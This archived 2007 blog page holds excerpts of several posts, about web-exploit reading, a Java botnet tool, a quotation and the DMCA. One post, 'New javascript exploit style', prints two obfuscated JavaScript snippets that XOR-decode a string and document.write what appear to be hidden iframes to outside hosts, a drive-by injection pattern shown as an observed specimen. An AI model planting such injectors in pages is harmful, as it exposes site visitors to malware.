You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Monthly Archives: May 2007

Great Reading List on Web Exploits

I was reading up on inet-lux and found a great blog post in spanish which provides a must read references list. I ended up here reading about a java based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone […]

Musings of a Chinese Vegetarian

Evil is the most dangerous when done in secret. Good is the least admirable when performed in public. In other words, evil is less dangerous when it is manifest than when it is secret; good is more laudable when it is occult than then it is public. translated by Yaichiro Isobe

User Generated Content

credit: Jason Arends

New javascript exploit style

Now with passwords? <script language=”JavaScript” type=”text/javascript”> <!– var password=’5%60o%7Bhdl%29z%7Bj4+a%7D %7Dy3%26%26fzlq%27ah%7Bm%24jf%7Bl%24qqq %27jfd%26%7Bhgm%27yay+%29%7E%60m %7Da4899%2C%29al%60na%7D48%3B99%29DH %5BN@G%5E@M%5DA49%29DH%5BN@GAL@NA %5D49%29AZYHJL49%29_ZYHJL49%29O%5B HDLKF%5BML%5B49%29ZJ%5BFEE4GF75%26 %60o%7Bhdl75a%7B%29%7E%60m%7Da4+%3E %3F9+%29z%60sl4+8+75m%60%7F%29z%7D pel4+yfz%60%7D%60fg3%29hkzfe%7C%7Dl2%29 elo%7D3%29%2400000yq2%29%7Dfy3%29%24 00000yq2%29%7E%60m%7Da3%298yq2%29al %60na%7D3%298yq2+7′; function get(key){var ID=’9′;var out=””;var i;for(i=0;i<key.length;i++) {out+=String.fromCharCode(ID^key.charCodeAt(i));} return out;}document.write(get(unescape(password))); //–> </script>   <script language=”JavaScript” type=”text/javascript”> <!– var password=’5%60o%7Bhdl%29z%7Bj4+a%7D%7Dy3 %26%2618%27%3B0%27%3B%3D8 %27%3B%3A%3F%26hjj%3B%26%7Ef%7Bb988 %3B%26%60gmlq%27yay+%29%7E%60m %7Da48%29al%60na%7D4875%26%60o%7Bhdl7′; function get(key){var ID=’9′;var out=””;var i;for(i=0;i<key.length;i++){out+=String.fromCharCode(ID^key.charCodeAt(i));} return out;}document.write(get(unescape(password))); //–> </script>

Aspects of the DMCA posting “The Key” violates

According to an article posted by EFF’s von Lohmann posting “The Key” will certainly violate aspects of the oft hated DMCA. A growing number of citizens in the US are starting to recognize just how badly the law conflicts with other guarantees of rights possessed by US citizens. No person shall … offer to the […]